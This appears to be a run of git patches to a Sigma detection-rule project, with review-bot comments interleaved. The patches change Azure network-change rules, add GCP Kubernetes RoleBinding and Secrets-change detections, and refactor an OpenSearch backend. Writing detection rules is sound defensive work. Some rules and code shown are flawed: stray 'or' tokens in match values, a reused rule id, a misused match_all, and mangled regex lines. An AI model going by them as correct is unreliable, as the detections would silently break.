@@ -1,7 +1,7 @@ title: Azure Virtual Network Modified or Deleted id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f description: Identifies when a Virtual Network is modified or deleted in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: From b9026f2dfeda481af2d3058a5fa73d6278e968e0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:36:50 -0500 Subject: [PATCH 0272/1367] Update azure_dns_zone_modified_or_deleted.yml --- rules/cloud/azure_dns_zone_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index db8e8c52..0cdc2247 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure DNS Zone Modified or Deleted id: af6925b0-8826-47f1-9324-337507a0babd description: Identifies when DNS zone is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: From 1f1aa7c31f0b38f4bef54835c22d9351c21ab3df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:38:15 -0500 Subject: [PATCH 0273/1367] Update azure_dns_zone_modified_or_deleted.yml --- .../azure_dns_zone_modified_or_deleted.yml | 27 +++---------------- 1 file changed, 4 insertions(+), 23 deletions(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index 0cdc2247..6028af1f 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml 
@@ -10,29 +10,10 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: - - MICROSOFT.NETWORK/DNSZONES/WRITE - - MICROSOFT.NETWORK/DNSZONES/DELETE - - MICROSOFT.NETWORK/DNSZONES/A/WRITE - - MICROSOFT.NETWORK/DNSZONES/A/DELETE - - MICROSOFT.NETWORK/DNSZONES/AAAA/WRITE - - MICROSOFT.NETWORK/DNSZONES/AAAA/DELETE - - MICROSOFT.NETWORK/DNSZONES/CAA/READ - - MICROSOFT.NETWORK/DNSZONES/CAA/WRITE - - MICROSOFT.NETWORK/DNSZONES/CAA/DELETE - - MICROSOFT.NETWORK/DNSZONES/CNAME/WRITE - - MICROSOFT.NETWORK/DNSZONES/CNAME/DELETE - - MICROSOFT.NETWORK/DNSZONES/MX/WRITE - - MICROSOFT.NETWORK/DNSZONES/MX/DELETE - - MICROSOFT.NETWORK/DNSZONES/NS/WRITE - - MICROSOFT.NETWORK/DNSZONES/NS/DELETE - - MICROSOFT.NETWORK/DNSZONES/PTR/WRITE - - MICROSOFT.NETWORK/DNSZONES/PTR/DELETE - - MICROSOFT.NETWORK/DNSZONES/SOA/WRITE - - MICROSOFT.NETWORK/DNSZONES/SRV/WRITE - - MICROSOFT.NETWORK/DNSZONES/SRV/DELETE - - MICROSOFT.NETWORK/DNSZONES/TXT/WRITE - - MICROSOFT.NETWORK/DNSZONES/TXT/DELETE + properties.message|startswith: MICROSOFT.NETWORK/DNSZONES + properties.message|endswith: + - /WRITE + - /DELETE condition: selection level: medium tags: From 5b25f56964e7152ad2a5c9a50c5f7905f6a3e99e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 15:36:30 -0500 Subject: [PATCH 0274/1367] Update azure_network_security_modified_or_deleted.yml --- rules/cloud/azure_network_security_modified_or_deleted.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_network_security_modified_or_deleted.yml b/rules/cloud/azure_network_security_modified_or_deleted.yml index 1c62b1e1..75b3733f 100644 --- a/rules/cloud/azure_network_security_modified_or_deleted.yml +++ b/rules/cloud/azure_network_security_modified_or_deleted.yml 
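Review bot: `properties.message|startswith: MICROSOFT.NETWORK/DNSZONES` has no trailing slash, so the prefix is looser than the enumerated operations it replaces; `MICROSOFT.NETWORK/DNSZONES/` still matches `MICROSOFT.NETWORK/DNSZONES/WRITE` and every record-set path while excluding any other provider path that merely starts with the same letters. The rewrite also silently drops `MICROSOFT.NETWORK/DNSZONES/CAA/READ` from the match set — consistent with the "modified or deleted" title, but since it changes what fires it deserves a line in the description and a `modified` date.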
@@ -1,7 +1,7 @@ title: Azure Network Security Configuration Modified or Deleted id: d22b4df4-5a67-4859-a578-8c9a0b5af9df description: Identifies when a network security configuration is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: @@ -15,6 +15,8 @@ detection: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection level: medium tags: From 27441d70932120bd37f74c90c915df3f2b9f4da8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 15:37:53 -0500 Subject: [PATCH 0275/1367] Update azure_network_p2s_vpn_modified_or_deleted.yml --- rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml index d65d147d..bea054aa 100644 --- a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml +++ b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml @@ -13,6 +13,10 @@ detection: properties.message: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection level: medium tags: From fa54a383940a5ff00f65bb088b7bda14c51ea564 Mon Sep 17 00:00:00 2001 
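Review bot: `MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION` is recorded when a NIC or subnet is associated with an NSG, i.e. routine resource deployment rather than a change to the security configuration the title describes, so expect this addition to raise the rule's volume; either drop it or document it under falsepositives. The `.../PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE` entry arguably belongs to defense evasion (turning NSG diagnostic logging off) rather than to whatever tags the rule carries below this hunk; consider adding `attack.defense_evasion` / `attack.t1562.008` and saying in the description that logging changes are covered.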
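Review bot: `MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION` does not modify or delete the gateway — it issues a client VPN profile — so it does not fit the title "Modified or Deleted"; an unexpected profile generation is arguably more interesting on its own (it hands connectivity material to whoever invoked it) and would be clearer as a separate rule than as one more value in this list. `RESET/ACTION` and `DISCONNECTP2SVPNCONNECTIONS/ACTION` are availability-impacting rather than configuration changes, which the description (outside this hunk) should mention so the alert reads correctly.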
From: Austin Songer Date: Mon, 9 Aug 2021 15:51:43 -0500 Subject: [PATCH 0276/1367] Update azure_virtual_network_modified_or_deleted.yml --- .../azure_virtual_network_modified_or_deleted.yml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure_virtual_network_modified_or_deleted.yml index 68f2c755..cf322fa2 100644 --- a/rules/cloud/azure_virtual_network_modified_or_deleted.yml +++ b/rules/cloud/azure_virtual_network_modified_or_deleted.yml @@ -10,11 +10,12 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: - - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/WRITE - - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/DELETE - - MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE - - MICROSOFT.NETWORK/VIRTUALNETWORKS/DELETE + properties.message|startswith: + - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/ + - MICROSOFT.NETWORK/VIRTUALNETWORKS/ + properties.message|endswith: + - /WRITE + - /DELETE condition: selection level: medium tags: From 6474968615ae90cdba0b582ef1f39150b58c66e4 Mon Sep 17 00:00:00 2001 From: Young Date: Mon, 9 Aug 2021 14:42:17 -0700 Subject: [PATCH 0277/1367] added helper functions to clean up code --- .../sigma/backends/defaultOpensearchValues.py | 7 +- tools/sigma/backends/opensearch.py | 293 ++++-------------- 2 files changed, 68 insertions(+), 232 deletions(-) diff --git a/tools/sigma/backends/defaultOpensearchValues.py b/tools/sigma/backends/defaultOpensearchValues.py index b31d28c6..87f0a582 100644 --- a/tools/sigma/backends/defaultOpensearchValues.py +++ b/tools/sigma/backends/defaultOpensearchValues.py 
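Review bot: The new `startswith: MICROSOFT.NETWORK/VIRTUALNETWORKS/` combined with `endswith: /WRITE` matches any sub-resource operation under a virtual network, not just the four exact values it replaces — presumably `MICROSOFT.NETWORK/VIRTUALNETWORKS/SUBNETS/WRITE` and `.../VIRTUALNETWORKPEERINGS/WRITE` now fire too, and subnet writes are routine in deployments. If that widening is intended, say so in the description and add the common cases to falsepositives; if not, keep the exact `MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE` and `.../DELETE` values. The commit message gives no hint either way.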
@@ -4,8 +4,7 @@ INTERVAL = 5
 UNIT = "MINUTES"
 TRIGGER_NAME = "generated-trigger"
 SEVERITIES = {"informational": "5", "low": "4", "medium": "3", "high": "2", "critical": "1"}
-RESULTS_INDEX = 0
-TRIGGER_INEQUALITY = ">"
-TRIGGER_THRESHOLD = 0
+TRIGGER_SCRIPT = "ctx.results[0].hits.total.value > 0"
 TRIGGER_LANGUAGE = "painless"
-MONITOR_INDICES = ["opensearch-security-logs"]
\ No newline at end of file
+MONITOR_INDICES = ["opensearch-security-logs"]
+NUM_RESULTS = 1
\ No newline at end of file
diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py
index c57f7cbd..825caa73 100644
--- a/tools/sigma/backends/opensearch.py
+++ b/tools/sigma/backends/opensearch.py
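Review bot: Folding index, inequality and threshold into the fixed string `TRIGGER_SCRIPT = "ctx.results[0].hits.total.value > 0"` removes the only knob that could carry a per-rule threshold; a Sigma rule with a `count() > N` aggregation cannot be expressed as "any hit" without silently lowering its bar. If such rules are meant to stay unsupported, a comment here saying so would help; otherwise keep a template such as `TRIGGER_SCRIPT = "ctx.results[0].hits.total.value > {threshold}"` and format it where the trigger is built.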
@@ -32,213 +32,10 @@ from sigma.config.mapping import ConditionalFieldMapping from .base import BaseBackend, SingleTextQueryBackend from .mixins import RulenameCommentMixin, MultiRuleOutputMixin from .exceptions import NotSupportedError +from .elasticsearch import DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin from .defaultOpensearchValues import * -class DeepFieldMappingMixin(object): - def fieldNameMapping(self, fieldname, value): - if isinstance(fieldname, str): - get_config = self.sigmaconfig.fieldmappings.get(fieldname) - if not get_config and '|' in fieldname: - fieldname = fieldname.split('|', 1)[0] - get_config = self.sigmaconfig.fieldmappings.get(fieldname) - if isinstance(get_config, ConditionalFieldMapping): - condition = self.sigmaconfig.fieldmappings.get(fieldname).conditions - for key, item in self.logsource.items(): - if condition.get(key) and condition.get(key, {}).get(item): - new_fieldname = condition.get(key, {}).get(item) - if any(new_fieldname): - return super().fieldNameMapping(new_fieldname[0], value) - return super().fieldNameMapping(fieldname, value) - - def generate(self, sigmaparser): - self.logsource = sigmaparser.parsedyaml.get("logsource", {}) - return super().generate(sigmaparser) - -class OpenSearchWildcardHandlingMixin(object): - """ - Determine field mapping to keyword subfields depending on existence of wildcards in search values. Further, - provide configurability with backend parameters. - """ - options = SingleTextQueryBackend.options + ( - ("keyword_field", "keyword", "Keyword sub-field name (default is: '.keyword'). Set blank value if all keyword fields are the base(top-level) field. Additionally see 'keyword_base_fields' for more granular control of the base & subfield situation.", None), - ("analyzed_sub_field_name", "", "Analyzed sub-field name. By default analyzed field is the base field. Therefore, use this option to make the analyzed field a subfield. 
An example value would be '.text' ", None), - ("analyzed_sub_fields", None, "Fields that have an analyzed sub-field.", None), - ("keyword_base_fields", None, "Fields that the keyword is base (top-level) field. By default analyzed field is the base field. So use this option to change that logic. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("keyword_whitelist", None, "Fields to always set as keyword. Bypasses case insensitive options. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("keyword_blacklist", None, "Fields to never set as keyword (ie: always set as analyzed field). Bypasses case insensitive options. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("case_insensitive_whitelist", None, "Fields to make the values case insensitive regex. Automatically sets the field as a keyword. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("case_insensitive_blacklist", None, "Fields to exclude from being made into case insensitive regex. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("wildcard_use_keyword", "true", "Use analyzed field or wildcard field if the query uses a wildcard value (ie: '*mall_wear.exe'). Set this to 'False' to use analyzed field or wildcard field. Valid options are: true/false", None), - ) - reContainsWildcard = re.compile("(?:(?\\*", value ) - # Make upper/lower - value = re.sub( r"[A-Za-z]", lambda x: "[" + x.group( 0 ).upper() + x.group( 0 ).lower() + "]", value ) - # Turn `.` into wildcard, only if odd number of '\'(because this would mean already escaped) - value = re.sub( r"(((?\.", value ) - # Turn `*` into wildcard, only if odd number of '\'(because this would mean already escaped) - value = re.sub( r"(((?.*", value ) - # Escape additional values that are treated as specific "operators" within Elastic. 
(ie: @, ?, &, <, >, and ~) - # reference: https://www.elastic.co/guide/en/elasticsearch/reference/current/regexp-syntax.html#regexp-optional-operators - value = re.sub( r"(((?])", "\g<1>\\\\\g<4>", value ) - # Validate regex - try: - re.compile(value) - return {'is_regex': True, 'value': value} - # Regex failed - except re.error: - raise TypeError( "Regular expression validation error for: '%s')" %str(value) ) - else: - return { 'is_regex': False, 'value': value } - -class OpenSearchQuerystringBackend(DeepFieldMappingMixin, OpenSearchWildcardHandlingMixin, SingleTextQueryBackend): +class OpenSearchQuerystringBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): """Converts Sigma rule into OpenSearch query string. Only searches, no aggregations.""" identifier = "es-qs" active = True @@ -303,7 +100,7 @@ class OpenSearchQuerystringBackend(DeepFieldMappingMixin, OpenSearchWildcardHand return super().generateSubexpressionNode(node) class OpenSearchBackend(object): - """Elasticsearch detection rule backend""" + """OpenSearch detection rule backend""" active = True uuid_black_list = [] options = OpenSearchQuerystringBackend.options + ( @@ -334,10 +131,15 @@ class OpenSearchBackend(object): print("Failed to parse {} configuration file '%s' as valid YAML: %s" % (path, str(e)), file=sys.stderr) return [] + ''' + Calls parent generate methods to retrieve Sigma rule condition as Elastic Common Schema query. + Then calls the create_rule method to return final translated object. + ''' def generate(self, sigmaparser): # reset per-detection variables self.rule_threshold = {} translation = super().generate(sigmaparser) + print(f'translation: {translation}\n') if translation: index = sigmaparser.get_logsource().index if len(index) == 0: 
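Review bot: `identifier = "es-qs"` on the retained `OpenSearchQuerystringBackend` appears to be the same identifier the Elasticsearch query-string backend uses, so whichever backend is registered last wins when sigmac resolves `--target es-qs`; an OpenSearch-specific value such as `identifier = "opensearch-qs"` would avoid the collision — confirm against elasticsearch.py, which is outside this hunk. Importing `DeepFieldMappingMixin` and `ElasticsearchWildcardHandlingMixin` from `.elasticsearch` is a sound de-duplication, but the backend's `options` tuple (keyword/analyzed field names, case-insensitivity lists) is now owned by the Elasticsearch module; a one-line comment at the import stating that OpenSearch deliberately shares those options would spare the next reader a search.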
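Review bot: `print(f'translation: {translation}\n')` in `generate()` is a leftover debug statement that writes to stdout, the same stream sigmac uses for the converted rule, so every conversion now emits a stray line ahead of the monitor JSON; drop it, or if the trace is wanted send it to stderr or `logging`. The `'''` block placed above `def generate` is a bare string expression in the class body rather than a docstring — move it to the first line inside the function so `help()` and IDEs pick it up.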
@@ -347,6 +149,9 @@ class OpenSearchBackend(object): rule = self.create_rule(configs, index) return rule + ''' + Generates threat detection for OpenSearch monitor, which compiles tactics and techniques found in Sigma tags. + ''' def create_threat_description(self, tactics_list, techniques_list): threat_list = list() for tactic in tactics_list: @@ -370,6 +175,9 @@ class OpenSearchBackend(object): threat_list.append(temp_tactics) return threat_list + ''' + Finds tactics mentioned in Sigma tags. + ''' def find_tactics(self, key_name=None, key_id=None): for tactic in self.tactics: if key_name and key_name == tactic.get("tactic", ""): @@ -377,11 +185,17 @@ class OpenSearchBackend(object): if key_id and key_id == tactic.get("external_id", ""): return tactic + ''' + Finds techniques mentioned in Sigma tags. + ''' def find_technique(self, key_id=None): for technique in self.techniques: if key_id and key_id == technique.get("technique_id", ""): return technique + ''' + Maps Sigma severity to OpenSearch numerical severity from 1-5. + ''' def map_severity(self, severity): severity = severity.lower() return SEVERITIES[severity] if severity in SEVERITIES else SEVERITIES["medium"] @@ -393,7 +207,7 @@ class OpenSearchBackend(object): "severity": self.map_severity(severity), "condition": { "script": { - "source": f'ctx.results[{RESULTS_INDEX}].hits.total.value {TRIGGER_INEQUALITY} {TRIGGER_THRESHOLD}', + "source": f'{TRIGGER_SCRIPT}', "lang": TRIGGER_LANGUAGE } }, 
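Review bot: The `'''` text added above `find_technique` and `map_severity` sits before the `def`, which makes it a no-op string statement in the class body rather than a docstring; move each one to the first line inside its function. While here, `map_severity` silently maps any unknown level to `SEVERITIES["medium"]`; a comment stating that fallback is deliberate would make the behaviour explicit for rule authors who mistype a level.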
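Review bot: `f'{TRIGGER_SCRIPT}'` is an f-string that interpolates a single constant and nothing else, so it is just `TRIGGER_SCRIPT`; write `"source": TRIGGER_SCRIPT,` unless a per-rule value is meant to be formatted in later, in which case the template in defaultOpensearchValues should carry a placeholder. The enclosing method starts outside this hunk.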
@@ -401,25 +215,31 @@ class OpenSearchBackend(object): } ] - # Only supports must and must_not queries - def build_query(self): + ''' + Builds OpenSearch monitor query from translated Elastic Common Schema query. + Only supports must and must_not clauses. + ''' + def build_query(self, translation): return { "bool": { "must": { - "match_all": {} + "match_all": translation } } } - def build_inputs(self): + ''' + Builds inputs field of OS monitor. + ''' + def build_inputs(self, translation): return [ { "search": { "index": MONITOR_INDICES, "query": { - "size": 0, # don't know what this field represents, but default to 0 + "size": NUM_RESULTS, "aggregations": {}, - "query": self.build_query() + "query": self.build_query(translation) } } } @@ -445,11 +265,10 @@ class OpenSearchBackend(object): new_ref = yml_filename return new_ref - def create_rule(self, configs, index): - tags = configs.get("tags", []) + def build_tags_list(self, tags): tactics_list = list() - technics_list = list() new_tags = list() + technics_list = list() for tag in tags: tag = tag.replace("attack.", "") @@ -476,7 +295,7 @@ class OpenSearchBackend(object): if tact: new_tags.append(tag.title()) tactics_list.append(tact) - + if self.custom_tag: if ',' in self.custom_tag: tag_split = self.custom_tag.split(",") 
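Review bot: `"match_all": translation` in `build_query` is wrong — `match_all` takes an empty object (optionally `boost`) and does not accept query text, so the translated query is either rejected by OpenSearch or ignored, in which case the monitor matches every document in `MONITOR_INDICES` and the `> 0` trigger fires on every run. Since the class docstring describes the translation as an OpenSearch query string, the clause should be `"must": {"query_string": {"query": translation}}`. The new docstring's "Only supports must and must_not clauses" also no longer matches the body, which builds only `must`.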
@@ -484,21 +303,38 @@ class OpenSearchBackend(object): new_tags.append(l_tag) else: new_tags.append(self.custom_tag) - - threat = self.create_threat_description(tactics_list=tactics_list, techniques_list=technics_list) - rule_name = configs.get("title", "") - rule_description = configs.get("description", "") - rule_uuid = configs.get("id", "").lower() + + return tactics_list, technics_list, new_tags + + ''' + Get the rule id of the Sigma rule. If the rule id is blank or isn't unique, generate a random one. + ''' + def get_rule_id(self, rule_uuid): + rule_uuid = rule_uuid.lower() if rule_uuid == "" or rule_uuid in self.uuid_black_list: rule_uuid = str(uuid4()) self.uuid_black_list.append(rule_uuid) rule_id = re.sub(re.compile('[()*+!,\[\].\s"]'), "_", rule_uuid) - inputs = self.build_inputs() - triggers = self.create_trigger(configs.get("level", "medium")) - references = configs.get("reference") - if references is None: - references = configs.get("references") + + return rule_id + + def create_rule(self, configs, index): + tactics_list, technics_list, new_tags = self.build_tags_list(configs.get("tags", [])) + threat = self.create_threat_description(tactics_list, technics_list) + + rule_name = configs.get("title", "") + + rule_description = configs.get("description", "") + + rule_id = self.get_rule_id(configs.get("id", "")) + + inputs = self.build_inputs(configs.get("translation", "")) + + triggers = self.create_trigger(configs.get("level", "medium")) + + references = configs.get("reference") if configs.get("reference") is not None else configs.get("references") + add_ref_yml= self.build_ymlfile_ref(configs) if add_ref_yml: if references is None: # No ref @@ -522,11 +358,12 @@ class OpenSearchBackend(object): "inputs": inputs, "tags": new_tags, "triggers": triggers, - "meta_data": { + "sigma_data": { "rule_id": rule_id, "threat": threat } } + if references: rule.update({"references": references}) return json.dumps(rule) 
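Review bot: `inputs = self.build_inputs(configs.get("translation", ""))` assumes `generate()` stores the translated query in `configs` under the key `translation`; the part of `generate()` that builds `configs` is outside this hunk, and if it does not, every monitor is emitted with an empty query and nothing fails loudly. Prefer failing fast — `translation = configs["translation"]`, or raise `ValueError` when it is empty — so a broken conversion is not silently deployed as a monitor. The `"meta_data"` → `"sigma_data"` rename changes the emitted JSON for anyone consuming it downstream; presumably intentional, but it deserves a line in the commit message.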
From 4542ab9a14d9b0fb96b04bcc54f187bf84c7fc55 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:01:16 -0500 Subject: [PATCH 0278/1367] Create gcp_kubernetes_rolebinding.yml --- rules/cloud/gcp_kubernetes_rolebinding.yml | 32 ++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/cloud/gcp_kubernetes_rolebinding.yml diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml new file mode 100644 index 00000000..1d687cce --- /dev/null +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml 
@@ -0,0 +1,32 @@ +title: Google Cloud Kubernetes RoleBinding +id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +description: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. +author: Austin Songer +status: experimental +date: 2021/08/09 +references: + - https://github.com/elastic/detection-rules/pull/1267 + - https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole + - https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control + - https://kubernetes.io/docs/reference/access-authn-authz/rbac/ + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging +logsource: + service: gcp.audit +detection: + selection: + properties.message: + - io.k8s.authorization.rbac.v*.clusterrolebindings.create or + - io.k8s.authorization.rbac.v*.rolebindings.create or + - io.k8s.authorization.rbac.v*.clusterrolebindings.patch or + - io.k8s.authorization.rbac.v*.rolebindings.patch or + - io.k8s.authorization.rbac.v*.clusterrolebindings.update or + - io.k8s.authorization.rbac.v*.rolebindings.update + - io.k8s.authorization.rbac.v*.clusterrolebindings.delete or + - io.k8s.authorization.rbac.v*.rolebindings.delete + condition: selection +level: medium +tags: + - attack.credential_access +falsepositives: + - RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 019bdaac9083ddb172b0ce50d2deb54675050ea2 Mon Sep 17 00:00:00 2001 
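Review bot: The detection lists `io.k8s.authorization.rbac.v*.clusterrolebindings.delete` and `...rolebindings.delete`, but the description says only "creation or patching", so one of the two should change; deleting a binding is a different signal (loss of access, cleanup after abuse) from granting one. The `attack.credential_access` tag is a poor fit — binding a subject to a (Cluster)Role grants permissions, which maps to privilege escalation / persistence (T1078- or T1098-style account manipulation) rather than credential theft; the referenced Elastic rule can be checked for its mapping. A short comment that the `v*` wildcard is intentional (to cover rbac API versions) would stop a reader from "fixing" it.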
From: Austin Songer Date: Mon, 9 Aug 2021 22:05:46 -0500 Subject: [PATCH 0279/1367] Update gcp_kubernetes_rolebinding.yml --- rules/cloud/gcp_kubernetes_rolebinding.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index 1d687cce..d920ae69 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -14,7 +14,7 @@ logsource: service: gcp.audit detection: selection: - properties.message: + eventName: - io.k8s.authorization.rbac.v*.clusterrolebindings.create or - io.k8s.authorization.rbac.v*.rolebindings.create or - io.k8s.authorization.rbac.v*.clusterrolebindings.patch or From 23d5ed9d23d8a4e1b43fed2b0cefbf1b879f93c2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:06:56 -0500 Subject: [PATCH 0280/1367] Create gcp_kubernetes_secrets_modified_or_deleted.yml --- ...kubernetes_secrets_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml new file mode 100644 index 00000000..8b78f993 --- /dev/null +++ b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml 
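Review bot: `eventName` replaces `properties.message`, but neither is the field GCP audit logs carry for the invoked API method — that is `protoPayload.methodName`, which the other `gcp.audit` rules in this tree appear to address as `gcp.audit.method_name`; confirm and use the same name so the GCP backend field mapping applies to this rule too. The rest of the rule is outside this hunk.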
@@ -0,0 +1,24 @@ +title: Google Cloud Kubernetes Secrets Modified or Deleted +id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +description: Identifies when the Secrets are Modified or Deleted. +author: Austin Songer +status: experimental +date: 2021/08/09 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging +logsource: + service: gcp.audit +detection: + selection: + eventName: + - io.k8s.core.v*.secrets.create + - io.k8s.core.v*.secrets.update + - io.k8s.core.v*.secrets.patch + - io.k8s.core.v*.secrets.delete + condition: selection +level: medium +tags: + - attack.credential_access +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From cc4b3d7d389d8147d4a8dc3668d210492862b646 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:07:49 -0500 Subject: [PATCH 0281/1367] Delete gcp_kubernetes_secrets_modified_or_deleted.yml --- ...kubernetes_secrets_modified_or_deleted.yml | 24 ------------------- 1 file changed, 24 deletions(-) delete mode 100644 rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml deleted file mode 100644 index 8b78f993..00000000 --- a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml +++ /dev/null 
@@ -1,24 +0,0 @@ -title: Google Cloud Kubernetes Secrets Modified or Deleted -id: 2f0bae2d-bf20-4465-be86-1311addebaa3 -description: Identifies when the Secrets are Modified or Deleted. -author: Austin Songer -status: experimental -date: 2021/08/09 -references: - - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging -logsource: - service: gcp.audit -detection: - selection: - eventName: - - io.k8s.core.v*.secrets.create - - io.k8s.core.v*.secrets.update - - io.k8s.core.v*.secrets.patch - - io.k8s.core.v*.secrets.delete - condition: selection -level: medium -tags: - - attack.credential_access -falsepositives: - - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From a48fd2135eb86de5a700c0a1cefe0e6f8749ffed Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:08:14 -0500 Subject: [PATCH 0282/1367] Create gcp_kubernetes_secrets_modified_or_deleted.yml --- ...kubernetes_secrets_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml new file mode 100644 index 00000000..8b78f993 --- /dev/null +++ b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml 
